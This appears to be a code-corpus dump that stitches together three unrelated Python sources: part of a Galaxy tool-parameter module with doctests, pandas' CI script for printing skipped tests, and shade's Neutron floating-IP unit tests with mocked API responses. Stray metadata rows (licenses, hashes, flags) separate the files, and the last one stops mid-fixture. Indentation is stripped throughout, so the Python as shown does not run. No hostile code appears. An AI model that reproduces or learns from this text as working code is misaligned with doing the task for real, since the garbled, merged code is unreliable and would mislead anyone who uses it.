<input type="text" name="blah" size="4" value="meh">
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.name = elem.get( 'name' )
self.size = elem.get( 'size' )
self.value = elem.get( 'value' )
self.area = str_bool( elem.get( 'area', False ) )
def get_html( self, trans=None, value=None, other_values={} ):
if self.area:
return form_builder.TextArea( self.name, self.size, value or self.value ).get_html()
return form_builder.TextField( self.name, self.size, value or self.value ).get_html()
class IntegerToolParameter( TextToolParameter ):
"""
Parameter that takes an integer value.
>>> p = IntegerToolParameter( None, XML( '<param name="blah" type="integer" size="4" value="10" />' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="text" name="blah" size="4" value="10">
>>> type( p.filter_value( "10" ) )
<type 'int'>
>>> type( p.filter_value( "bleh" ) )
Traceback (most recent call last):
...
ValueError: An integer is required
"""
def filter_value( self, value, trans=None, other_values={} ):
try: return int( value )
except: raise ValueError( "An integer is required" )
def to_python( self, value, app ):
return int( value )
class FloatToolParameter( TextToolParameter ):
"""
Parameter that takes a real number value.
>>> p = FloatToolParameter( None, XML( '<param name="blah" type="integer" size="4" value="3.141592" />' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="text" name="blah" size="4" value="3.141592">
>>> type( p.filter_value( "36.1" ) )
<type 'float'>
>>> type( p.filter_value( "bleh" ) )
Traceback (most recent call last):
...
ValueError: A real number is required
"""
def filter_value( self, value, trans=None, other_values={} ):
try: return float( value )
except: raise ValueError( "A real number is required")
def to_python( self, value, app ):
return float( value )
class BooleanToolParameter( ToolParameter ):
"""
Parameter that takes one of two values.
>>> p = BooleanToolParameter( None, XML( '<param name="blah" type="boolean" checked="yes" truevalue="bulletproof vests" falsevalue="cellophane chests" />' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="checkbox" name="blah" value="true" checked><input type="hidden" name="blah" value="true">
>>> print p.filter_value( ["true","true"] )
bulletproof vests
>>> print p.filter_value( ["true"] )
cellophane chests
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.truevalue = elem.get( 'truevalue', 'true' )
self.falsevalue = elem.get( 'falsevalue', 'false' )
self.name = elem.get( 'name' )
self.checked = elem.get( 'checked' )
def get_html( self, trans=None, value=None, other_values={} ):
checked = self.checked
if value: checked = form_builder.CheckboxField.is_checked( value )
return form_builder.CheckboxField( self.name, checked ).get_html()
def filter_value( self, value, trans=None, other_values={} ):
if form_builder.CheckboxField.is_checked( value ):
return self.truevalue
else:
return self.falsevalue
def to_python( self, value, app ):
return ( value == 'True' )
class FileToolParameter( ToolParameter ):
"""
Parameter that takes an uploaded file as a value.
>>> p = FileToolParameter( None, XML( '<param name="blah" type="file"/>' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="file" name="blah">
"""
def __init__( self, tool, elem ):
"""
Example: C{<param name="bins" type="file" />}
"""
ToolParameter.__init__( self, tool, elem )
self.html = form_builder.FileField( elem.get( 'name') ).get_html()
def get_required_enctype( self ):
"""
File upload elements require the multipart/form-data encoding
"""
return "multipart/form-data"
def to_string( self, value, app ):
raise Exception( "FileToolParameter cannot be persisted" )
def to_python( self, value, app ):
raise Exception( "FileToolParameter cannot be persisted" )
class HiddenToolParameter( ToolParameter ):
"""
    Parameter whose value is a fixed, hidden form field.
FIXME: This seems hacky, parameters should only describe things the user
might change. It is used for 'initializing' the UCSC proxy tool
>>> p = HiddenToolParameter( None, XML( '<param name="blah" type="hidden" value="wax so rockin"/>' ) )
>>> print p.name
blah
>>> print p.get_html()
<input type="hidden" name="blah" value="wax so rockin">
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.name = elem.get( 'name' )
self.value = elem.get( 'value' )
self.html = form_builder.HiddenField( self.name, self.value ).get_html()
## This is clearly a HACK, parameters should only be used for things the user
## can change, there needs to be a different way to specify this. I'm leaving
## it for now to avoid breaking any tools.
class BaseURLToolParameter( ToolParameter ):
"""
    Returns a parameter that contains its value prepended by the
    current server base url. Used in all redirects.
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.name = elem.get( 'name' )
self.value = elem.get( 'value', '' )
def get_html( self, trans=None, value=None, other_values={} ):
return form_builder.HiddenField( self.name, trans.request.base + self.value ).get_html()
class SelectToolParameter( ToolParameter ):
"""
    Parameter that takes on one (or many) of a specific set of values.
TODO: There should be an alternate display that allows single selects to be
displayed as radio buttons and multiple selects as a set of checkboxes
>>> p = SelectToolParameter( None, XML(
... '''
... <param name="blah" type="select">
... <option value="x">I am X</option>
... <option value="y" selected="true">I am Y</option>
... <option value="z">I am Z</option>
... </param>
... ''' ) )
>>> print p.name
blah
>>> print p.get_html()
<select name="blah">
<option value="x">I am X</option>
<option value="y" selected>I am Y</option>
<option value="z">I am Z</option>
</select>
>>> print p.get_html( value="z" )
<select name="blah">
<option value="x">I am X</option>
<option value="y">I am Y</option>
<option value="z" selected>I am Z</option>
</select>
>>> print p.filter_value( "y" )
y
>>> p = SelectToolParameter( None, XML(
... '''
... <param name="blah" type="select" multiple="true">
... <option value="x">I am X</option>
... <option value="y" selected="true">I am Y</option>
... <option value="z" selected="true">I am Z</option>
... </param>
... ''' ) )
>>> print p.name
blah
>>> print p.get_html()
<select name="blah" multiple>
<option value="x">I am X</option>
<option value="y" selected>I am Y</option>
<option value="z" selected>I am Z</option>
</select>
>>> print p.get_html( value=["x","y"])
<select name="blah" multiple>
<option value="x" selected>I am X</option>
<option value="y" selected>I am Y</option>
<option value="z">I am Z</option>
</select>
>>> print p.filter_value( ["y", "z"] )
y,z
>>> p = SelectToolParameter( None, XML(
... '''
... <param name="blah" type="select" multiple="true" display="checkboxes">
... <option value="x">I am X</option>
... <option value="y" selected="true">I am Y</option>
... <option value="z" selected="true">I am Z</option>
... </param>
... ''' ) )
>>> print p.name
blah
>>> print p.get_html()
<div><input type="checkbox" name="blah" value="x">I am X</div>
<div><input type="checkbox" name="blah" value="y" checked>I am Y</div>
<div><input type="checkbox" name="blah" value="z" checked>I am Z</div>
>>> print p.get_html( value=["x","y"])
<div><input type="checkbox" name="blah" value="x" checked>I am X</div>
<div><input type="checkbox" name="blah" value="y" checked>I am Y</div>
<div><input type="checkbox" name="blah" value="z">I am Z</div>
>>> print p.filter_value( ["y", "z"] )
y,z
"""
def __init__( self, tool, elem):
ToolParameter.__init__( self, tool, elem )
self.multiple = str_bool( elem.get( 'multiple', False ) )
self.display = elem.get( 'display', None )
self.separator = elem.get( 'separator', ',' )
self.legal_values = set()
self.dynamic_options = elem.get( "dynamic_options", None )
if self.dynamic_options is None:
self.options = list()
for index, option in enumerate( elem.findall("option") ):
value = option.get( "value" )
self.legal_values.add( value )
selected = ( option.get( "selected", None ) == "true" )
self.options.append( ( option.text, value, selected ) )
def get_html( self, trans=None, value=None, other_values={} ):
if value is not None:
if not isinstance( value, list ): value = [ value ]
field = form_builder.SelectField( self.name, self.multiple, self.display )
if self.dynamic_options:
options = eval( self.dynamic_options, self.tool.code_namespace, other_values )
else:
options = self.options
for text, optval, selected in options:
if value: selected = ( optval in value )
field.add_option( text, optval, selected )
return field.get_html()
def filter_value( self, value, trans=None, other_values={} ):
if self.dynamic_options:
legal_values = set( v for _, v, _ in eval( self.dynamic_options, self.tool.code_namespace, other_values ) )
else:
legal_values = self.legal_values
if isinstance( value, list ):
assert self.multiple, "Multiple values provided but parameter is not expecting multiple values"
rval = []
for v in value:
v = util.restore_text( v )
assert v in legal_values
rval.append( v )
return self.separator.join( rval )
else:
value = util.restore_text( value )
assert value in legal_values
return value
class DataToolParameter( ToolParameter ):
"""
    Parameter that takes on one (or many) of the datasets in the current history.
TODO: There should be an alternate display that allows single selects to be
displayed as radio buttons and multiple selects as a set of checkboxes
>>> # Mock up a history (not connected to database)
>>> from galaxy.model import History, Dataset
>>> from cookbook.patterns import Bunch
>>> hist = History()
>>> hist.add_dataset( Dataset( id=1, extension='text' ) )
>>> hist.add_dataset( Dataset( id=2, extension='bed' ) )
>>> hist.add_dataset( Dataset( id=3, extension='fasta' ) )
>>> hist.add_dataset( Dataset( id=4, extension='png' ) )
>>> hist.add_dataset( Dataset( id=5, extension='interval' ) )
>>> p = DataToolParameter( None, XML( '<param name="blah" type="data" format="interval"/>' ) )
>>> print p.name
blah
>>> print p.get_html( trans=Bunch( history=hist ) )
<select name="blah">
<option value="2">2: Unnamed dataset</option>
<option value="5" selected>5: Unnamed dataset</option>
</select>
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
self.format = datatypes.get_datatype_by_extension( elem.get( 'format', 'data' ).lower() )
self.multiple = str_bool( elem.get( 'multiple', False ) )
self.optional = str_bool( elem.get( 'optional', False ) )
def get_html( self, trans=None, value=None, other_values={} ):
assert trans is not None, "DataToolParameter requires a trans"
history = trans.history
assert history is not None, "DataToolParameter requires a history"
if value is not None:
if type( value ) != list: value = [ value ]
field = form_builder.SelectField( self.name, self.multiple )
some_data = False
for data in history.datasets:
if isinstance( data.datatype, self.format.__class__ ) and not data.parent_id:
some_data = True
selected = ( value and ( data in value ) )
field.add_option( "%d: %s" % ( data.hid, data.name[:30] ), data.id, selected )
if some_data and value is None:
# Ensure that the last item is always selected
a, b, c = field.options[-1]; field.options[-1] = a, b, True
else:
# HACK: we should just disable the form or something
field.add_option( "no data has the proper type", '' )
if self.optional == True:
field.add_option( "Selection is Optional", 'None', True )
return field.get_html()
def filter_value( self, value, trans, other_values={} ):
if not value:
raise ValueError( "A data of the appropriate type is required" )
if value in [None, "None"]:
temp_data = trans.app.model.Dataset()
temp_data.state = temp_data.states.FAKE
return temp_data
if isinstance( value, list ):
return [ trans.app.model.Dataset.get( v ) for v in value ]
else:
return trans.app.model.Dataset.get( value )
def to_string( self, value, app ):
return value.id
def to_python( self, value, app ):
return app.model.Dataset.get( int( value ) )
class RawToolParameter( ToolParameter ):
"""
Completely nondescript parameter, HTML representation is provided as text
contents.
>>> p = RawToolParameter( None, XML(
... '''
... <param name="blah" type="raw">
... <![CDATA[<span id="$name">Some random stuff</span>]]>
... </param>
... ''' ) )
>>> print p.name
blah
>>> print p.get_html().strip()
<span id="blah">Some random stuff</span>
"""
def __init__( self, tool, elem ):
ToolParameter.__init__( self, tool, elem )
template = string.Template( elem.text )
self.html = template.substitute( self.__dict__ )
# class HistoryIDParameter( ToolParameter ):
# """
# Parameter that takes a name value, makes history.id available.
#
# FIXME: This is a hack (esp. if hidden params are a hack) but in order to
# have the history accessable at the job level, it is necessary
# I also probably wrote this docstring test thing wrong.
#
# >>> from galaxy.model import History, Dataset
# >>> from cookbook.patterns import Bunch
# >>> hist = History( id=1 )
# >>> p = HistoryIDParameter( None, XML( '<param name="blah" type="history"/>' ) )
# >>> print p.name
# blah
# >>> html_string = '<input type="hidden" name="blah" value="%d">' % hist.id
# >>> assert p.get_html( trans=Bunch( history=hist ) ) == html_string
# """
# def __init__( self, tool, elem ):
# ToolParameter.__init__( self, tool, elem )
# self.name = elem.get('name')
# def get_html( self, trans, value=None, other_values={} ):
# assert trans.history is not None, "HistoryIDParameter requires a history"
# self.html = form_builder.HiddenField( self.name, trans.history.id ).get_html()
# return self.html
parameter_types = dict( text = TextToolParameter,
integer = IntegerToolParameter,
float = FloatToolParameter,
boolean = BooleanToolParameter,
select = SelectToolParameter,
hidden = HiddenToolParameter,
baseurl = BaseURLToolParameter,
file = FileToolParameter,
data = DataToolParameter,
raw = RawToolParameter )
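# A minimal sketch of the factory dispatch (the element below is hypothetical,
# not part of this module):
#   elem = XML( '<param name="cutoff" type="integer" size="4" value="10" />' )
#   param = ToolParameter.build( None, elem )   # -> IntegerToolParameter via parameter_types
#   param.filter_value( "12" )                  # -> 12 (int), or ValueError for non-integers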
def get_suite():
"""Get unittest suite for this module"""
import doctest, sys
return doctest.DocTestSuite( sys.modules[__name__] )
def str_bool(in_str):
"""
    Return the boolean meaning of a string: only the (case-insensitive) literal
    'true' yields True. This exists because bool(str) is True for any non-empty
    string; the default action is to return False.
"""
if str(in_str).lower() == 'true':
return True
return False
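# Behavior sketch for str_bool (illustrative, not part of the original module):
#   str_bool("True") -> True; str_bool("false"), str_bool("0") and str_bool("") -> False,
#   whereas bool("false") would be True because any non-empty string is truthy.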
|
mit
| -6,214,418,039,163,646,000
| 39.19596
| 162
| 0.587304
| false
| 3.837963
| false
| false
| false
|
toobaz/pandas
|
ci/print_skipped.py
|
1
|
1409
|
#!/usr/bin/env python
import os
import sys
import math
import xml.etree.ElementTree as et
def parse_results(filename):
tree = et.parse(filename)
root = tree.getroot()
skipped = []
current_class = ""
i = 1
assert i - 1 == len(skipped)
for el in root.findall("testcase"):
cn = el.attrib["classname"]
for sk in el.findall("skipped"):
old_class = current_class
current_class = cn
name = "{classname}.{name}".format(
classname=current_class, name=el.attrib["name"]
)
msg = sk.attrib["message"]
out = ""
if old_class != current_class:
ndigits = int(math.log(i, 10) + 1)
# 4 for : + space + # + space
out += "-" * (len(name + msg) + 4 + ndigits) + "\n"
out += "#{i} {name}: {msg}".format(i=i, name=name, msg=msg)
skipped.append(out)
i += 1
assert i - 1 == len(skipped)
assert i - 1 == len(skipped)
# assert len(skipped) == int(root.attrib['skip'])
return "\n".join(skipped)
def main():
test_files = ["test-data-single.xml", "test-data-multiple.xml", "test-data.xml"]
print("SKIPPED TESTS:")
for fn in test_files:
if os.path.isfile(fn):
print(parse_results(fn))
return 0
if __name__ == "__main__":
sys.exit(main())
|
bsd-3-clause
| -8,257,308,143,200,926,000
| 26.096154
| 84
| 0.515259
| false
| 3.594388
| true
| false
| false
|
openstack-infra/shade
|
shade/tests/unit/test_floating_ip_neutron.py
|
1
|
41101
|
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
test_floating_ip_neutron
----------------------------------
Tests Floating IP resource methods for Neutron
"""
import copy
import datetime
import munch
from shade import exc
from shade.tests import fakes
from shade.tests.unit import base
class TestFloatingIP(base.RequestsMockTestCase):
mock_floating_ip_list_rep = {
'floatingips': [
{
'router_id': 'd23abc8d-2991-4a55-ba98-2aaea84cc72f',
'tenant_id': '4969c491a3c74ee4af974e6d800c62de',
'floating_network_id': '376da547-b977-4cfe-9cba-275c80debf57',
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.229',
'port_id': 'ce705c24-c1ef-408a-bda3-7bbd946164ac',
'id': '2f245a7b-796b-4f26-9cf9-9e82d248fda7',
'status': 'ACTIVE'
},
{
'router_id': None,
'tenant_id': '4969c491a3c74ee4af974e6d800c62de',
'floating_network_id': '376da547-b977-4cfe-9cba-275c80debf57',
'fixed_ip_address': None,
'floating_ip_address': '203.0.113.30',
'port_id': None,
'id': '61cea855-49cb-4846-997d-801b70c71bdd',
'status': 'DOWN'
}
]
}
mock_floating_ip_new_rep = {
'floatingip': {
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.229',
'floating_network_id': 'my-network-id',
'id': '2f245a7b-796b-4f26-9cf9-9e82d248fda8',
'port_id': None,
'router_id': None,
'status': 'ACTIVE',
'tenant_id': '4969c491a3c74ee4af974e6d800c62df'
}
}
mock_floating_ip_port_rep = {
'floatingip': {
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.229',
'floating_network_id': 'my-network-id',
'id': '2f245a7b-796b-4f26-9cf9-9e82d248fda8',
'port_id': 'ce705c24-c1ef-408a-bda3-7bbd946164ac',
'router_id': None,
'status': 'ACTIVE',
'tenant_id': '4969c491a3c74ee4af974e6d800c62df'
}
}
mock_get_network_rep = {
'status': 'ACTIVE',
'subnets': [
'54d6f61d-db07-451c-9ab3-b9609b6b6f0b'
],
'name': 'my-network',
'provider:physical_network': None,
'admin_state_up': True,
'tenant_id': '4fd44f30292945e481c7b8a0c8908869',
'provider:network_type': 'local',
'router:external': True,
'shared': True,
'id': 'my-network-id',
'provider:segmentation_id': None
}
mock_search_ports_rep = [
{
'status': 'ACTIVE',
'binding:host_id': 'devstack',
'name': 'first-port',
'created_at': datetime.datetime.now().isoformat(),
'allowed_address_pairs': [],
'admin_state_up': True,
'network_id': '70c1db1f-b701-45bd-96e0-a313ee3430b3',
'tenant_id': '',
'extra_dhcp_opts': [],
'binding:vif_details': {
'port_filter': True,
'ovs_hybrid_plug': True
},
'binding:vif_type': 'ovs',
'device_owner': 'compute:None',
'mac_address': 'fa:16:3e:58:42:ed',
'binding:profile': {},
'binding:vnic_type': 'normal',
'fixed_ips': [
{
'subnet_id': '008ba151-0b8c-4a67-98b5-0d2b87666062',
'ip_address': u'172.24.4.2'
}
],
'id': 'ce705c24-c1ef-408a-bda3-7bbd946164ac',
'security_groups': [],
'device_id': 'server-id'
}
]
def assertAreInstances(self, elements, elem_type):
for e in elements:
self.assertIsInstance(e, elem_type)
def setUp(self):
super(TestFloatingIP, self).setUp()
self.fake_server = fakes.make_fake_server(
'server-id', '', 'ACTIVE',
addresses={u'test_pnztt_net': [{
u'OS-EXT-IPS:type': u'fixed',
u'addr': '192.0.2.129',
u'version': 4,
u'OS-EXT-IPS-MAC:mac_addr':
u'fa:16:3e:ae:7d:42'}]})
self.floating_ip = self.cloud._normalize_floating_ips(
self.mock_floating_ip_list_rep['floatingips'])[0]
def test_float_no_status(self):
floating_ips = [
{
'fixed_ip_address': '10.0.0.4',
'floating_ip_address': '172.24.4.229',
'floating_network_id': 'my-network-id',
'id': '2f245a7b-796b-4f26-9cf9-9e82d248fda8',
'port_id': None,
'router_id': None,
'tenant_id': '4969c491a3c74ee4af974e6d800c62df'
}
]
normalized = self.cloud._normalize_floating_ips(floating_ips)
self.assertEqual('UNKNOWN', normalized[0]['status'])
def test_list_floating_ips(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_list_rep)])
floating_ips = self.cloud.list_floating_ips()
self.assertIsInstance(floating_ips, list)
self.assertAreInstances(floating_ips, dict)
self.assertEqual(2, len(floating_ips))
self.assert_calls()
def test_list_floating_ips_with_filters(self):
self.register_uris([
dict(method='GET',
uri=('https://network.example.com/v2.0/floatingips.json?'
'Foo=42'),
json={'floatingips': []})])
self.cloud.list_floating_ips(filters={'Foo': 42})
self.assert_calls()
def test_search_floating_ips(self):
self.register_uris([
dict(method='GET',
uri=('https://network.example.com/v2.0/floatingips.json'),
json=self.mock_floating_ip_list_rep)])
floating_ips = self.cloud.search_floating_ips(
filters={'attached': False})
self.assertIsInstance(floating_ips, list)
self.assertAreInstances(floating_ips, dict)
self.assertEqual(1, len(floating_ips))
self.assert_calls()
def test_get_floating_ip(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_list_rep)])
floating_ip = self.cloud.get_floating_ip(
id='2f245a7b-796b-4f26-9cf9-9e82d248fda7')
self.assertIsInstance(floating_ip, dict)
self.assertEqual('172.24.4.229', floating_ip['floating_ip_address'])
self.assertEqual(
self.mock_floating_ip_list_rep['floatingips'][0]['tenant_id'],
floating_ip['project_id']
)
self.assertEqual(
self.mock_floating_ip_list_rep['floatingips'][0]['tenant_id'],
floating_ip['tenant_id']
)
self.assertIn('location', floating_ip)
self.assert_calls()
def test_get_floating_ip_not_found(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_list_rep)])
floating_ip = self.cloud.get_floating_ip(id='non-existent')
self.assertIsNone(floating_ip)
self.assert_calls()
def test_get_floating_ip_by_id(self):
fid = self.mock_floating_ip_new_rep['floatingip']['id']
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/floatingips/'
'{id}'.format(id=fid),
json=self.mock_floating_ip_new_rep)])
floating_ip = self.cloud.get_floating_ip_by_id(id=fid)
self.assertIsInstance(floating_ip, dict)
self.assertEqual('172.24.4.229', floating_ip['floating_ip_address'])
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['tenant_id'],
floating_ip['project_id']
)
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['tenant_id'],
floating_ip['tenant_id']
)
self.assertIn('location', floating_ip)
self.assert_calls()
def test_create_floating_ip(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_new_rep,
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id'}}))
])
ip = self.cloud.create_floating_ip(network='my-network')
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['floating_ip_address'],
ip['floating_ip_address'])
self.assert_calls()
def test_create_floating_ip_port_bad_response(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_new_rep,
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id',
'port_id': u'ce705c24-c1ef-408a-bda3-7bbd946164ab'}}))
])
# Fails because we requested a port and the returned FIP has no port
self.assertRaises(
exc.OpenStackCloudException,
self.cloud.create_floating_ip,
network='my-network', port='ce705c24-c1ef-408a-bda3-7bbd946164ab')
self.assert_calls()
def test_create_floating_ip_port(self):
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json=self.mock_floating_ip_port_rep,
validate=dict(
json={'floatingip': {
'floating_network_id': 'my-network-id',
'port_id': u'ce705c24-c1ef-408a-bda3-7bbd946164ac'}}))
])
ip = self.cloud.create_floating_ip(
network='my-network', port='ce705c24-c1ef-408a-bda3-7bbd946164ac')
self.assertEqual(
self.mock_floating_ip_new_rep['floatingip']['floating_ip_address'],
ip['floating_ip_address'])
self.assert_calls()
def test_neutron_available_floating_ips(self):
"""
Test without specifying a network name.
"""
fips_mock_uri = 'https://network.example.com/v2.0/floatingips.json'
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={'subnets': []}),
dict(method='GET', uri=fips_mock_uri, json={'floatingips': []}),
dict(method='POST', uri=fips_mock_uri,
json=self.mock_floating_ip_new_rep,
validate=dict(json={
'floatingip': {
'floating_network_id': self.mock_get_network_rep['id']
}}))
])
# Test if first network is selected if no network is given
self.cloud._neutron_available_floating_ips()
self.assert_calls()
def test_neutron_available_floating_ips_network(self):
"""
Test with specifying a network name.
"""
fips_mock_uri = 'https://network.example.com/v2.0/floatingips.json'
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={'subnets': []}),
dict(method='GET', uri=fips_mock_uri, json={'floatingips': []}),
dict(method='POST', uri=fips_mock_uri,
json=self.mock_floating_ip_new_rep,
validate=dict(json={
'floatingip': {
'floating_network_id': self.mock_get_network_rep['id']
}}))
])
        # Test that the specified network name is used
self.cloud._neutron_available_floating_ips(
network=self.mock_get_network_rep['name']
)
self.assert_calls()
def test_neutron_available_floating_ips_invalid_network(self):
"""
Test with an invalid network name.
"""
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={'networks': [self.mock_get_network_rep]}),
dict(method='GET',
uri='https://network.example.com/v2.0/subnets.json',
json={'subnets': []})
])
self.assertRaises(
exc.OpenStackCloudException,
self.cloud._neutron_available_floating_ips,
network='INVALID')
self.assert_calls()
def test_auto_ip_pool_no_reuse(self):
# payloads taken from citycloud
self.register_uris([
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={"networks": [{
"status": "ACTIVE",
"subnets": [
"df3e17fa-a4b2-47ae-9015-bc93eb076ba2",
"6b0c3dc9-b0b8-4d87-976a-7f2ebf13e7ec",
"fc541f48-fc7f-48c0-a063-18de6ee7bdd7"],
"availability_zone_hints": [],
"availability_zones": ["nova"],
"name": "ext-net",
"admin_state_up": True,
"tenant_id": "a564613210ee43708b8a7fc6274ebd63",
"tags": [],
"ipv6_address_scope": "9f03124f-89af-483a-b6fd-10f08079db4d", # noqa
"mtu": 0,
"is_default": False,
"router:external": True,
"ipv4_address_scope": None,
"shared": False,
"id": "0232c17f-2096-49bc-b205-d3dcd9a30ebf",
"description": None
}, {
"status": "ACTIVE",
"subnets": ["f0ad1df5-53ee-473f-b86b-3604ea5591e9"],
"availability_zone_hints": [],
"availability_zones": ["nova"],
"name": "private",
"admin_state_up": True,
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"created_at": "2016-10-22T13:46:26",
"tags": [],
"updated_at": "2016-10-22T13:46:26",
"ipv6_address_scope": None,
"router:external": False,
"ipv4_address_scope": None,
"shared": False,
"mtu": 1450,
"id": "2c9adcb5-c123-4c5a-a2ba-1ad4c4e1481f",
"description": ""
}]}),
dict(method='GET',
uri='https://network.example.com/v2.0/ports.json'
'?device_id=f80e3ad0-e13e-41d4-8e9c-be79bccdb8f7',
json={"ports": [{
"status": "ACTIVE",
"created_at": "2017-02-06T20:59:45",
"description": "",
"allowed_address_pairs": [],
"admin_state_up": True,
"network_id": "2c9adcb5-c123-4c5a-a2ba-1ad4c4e1481f",
"dns_name": None,
"extra_dhcp_opts": [],
"mac_address": "fa:16:3e:e8:7f:03",
"updated_at": "2017-02-06T20:59:49",
"name": "",
"device_owner": "compute:None",
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"binding:vnic_type": "normal",
"fixed_ips": [{
"subnet_id": "f0ad1df5-53ee-473f-b86b-3604ea5591e9",
"ip_address": "10.4.0.16"}],
"id": "a767944e-057a-47d1-a669-824a21b8fb7b",
"security_groups": [
"9fb5ba44-5c46-4357-8e60-8b55526cab54"],
"device_id": "f80e3ad0-e13e-41d4-8e9c-be79bccdb8f7",
}]}),
dict(method='POST',
uri='https://network.example.com/v2.0/floatingips.json',
json={"floatingip": {
"router_id": "9de9c787-8f89-4a53-8468-a5533d6d7fd1",
"status": "DOWN",
"description": "",
"dns_domain": "",
"floating_network_id": "0232c17f-2096-49bc-b205-d3dcd9a30ebf", # noqa
"fixed_ip_address": "10.4.0.16",
"floating_ip_address": "89.40.216.153",
"port_id": "a767944e-057a-47d1-a669-824a21b8fb7b",
"id": "e69179dc-a904-4c9a-a4c9-891e2ecb984c",
"dns_name": "",
"tenant_id": "65222a4d09ea4c68934fa1028c77f394"
}},
validate=dict(json={"floatingip": {
"floating_network_id": "0232c17f-2096-49bc-b205-d3dcd9a30ebf", # noqa
"fixed_ip_address": "10.4.0.16",
"port_id": "a767944e-057a-47d1-a669-824a21b8fb7b",
}})),
dict(method='GET',
uri='{endpoint}/servers/detail'.format(
endpoint=fakes.COMPUTE_ENDPOINT),
json={"servers": [{
"status": "ACTIVE",
"updated": "2017-02-06T20:59:49Z",
"addresses": {
"private": [{
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:e8:7f:03",
"version": 4,
"addr": "10.4.0.16",
"OS-EXT-IPS:type": "fixed"
}, {
"OS-EXT-IPS-MAC:mac_addr": "fa:16:3e:e8:7f:03",
"version": 4,
"addr": "89.40.216.153",
"OS-EXT-IPS:type": "floating"
}]},
"key_name": None,
"image": {"id": "95e4c449-8abf-486e-97d9-dc3f82417d2d"},
"OS-EXT-STS:task_state": None,
"OS-EXT-STS:vm_state": "active",
"OS-SRV-USG:launched_at": "2017-02-06T20:59:48.000000",
"flavor": {"id": "2186bd79-a05e-4953-9dde-ddefb63c88d4"},
"id": "f80e3ad0-e13e-41d4-8e9c-be79bccdb8f7",
"security_groups": [{"name": "default"}],
"OS-SRV-USG:terminated_at": None,
"OS-EXT-AZ:availability_zone": "nova",
"user_id": "c17534835f8f42bf98fc367e0bf35e09",
"name": "testmt",
"created": "2017-02-06T20:59:44Z",
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"OS-DCF:diskConfig": "MANUAL",
"os-extended-volumes:volumes_attached": [],
"accessIPv4": "",
"accessIPv6": "",
"progress": 0,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"metadata": {}
}]}),
dict(method='GET',
uri='https://network.example.com/v2.0/networks.json',
json={"networks": [{
"status": "ACTIVE",
"subnets": [
"df3e17fa-a4b2-47ae-9015-bc93eb076ba2",
"6b0c3dc9-b0b8-4d87-976a-7f2ebf13e7ec",
"fc541f48-fc7f-48c0-a063-18de6ee7bdd7"],
"availability_zone_hints": [],
"availability_zones": ["nova"],
"name": "ext-net",
"admin_state_up": True,
"tenant_id": "a564613210ee43708b8a7fc6274ebd63",
"tags": [],
"ipv6_address_scope": "9f03124f-89af-483a-b6fd-10f08079db4d", # noqa
"mtu": 0,
"is_default": False,
"router:external": True,
"ipv4_address_scope": None,
"shared": False,
"id": "0232c17f-2096-49bc-b205-d3dcd9a30ebf",
"description": None
}, {
"status": "ACTIVE",
"subnets": ["f0ad1df5-53ee-473f-b86b-3604ea5591e9"],
"availability_zone_hints": [],
"availability_zones": ["nova"],
"name": "private",
"admin_state_up": True,
"tenant_id": "65222a4d09ea4c68934fa1028c77f394",
"created_at": "2016-10-22T13:46:26",
"tags": [],
"updated_at": "2016-10-22T13:46:26",
"ipv6_address_scope": None,
"router:external": False,
"ipv4_address_scope": None,
"shared": False,
"mtu": 1450,
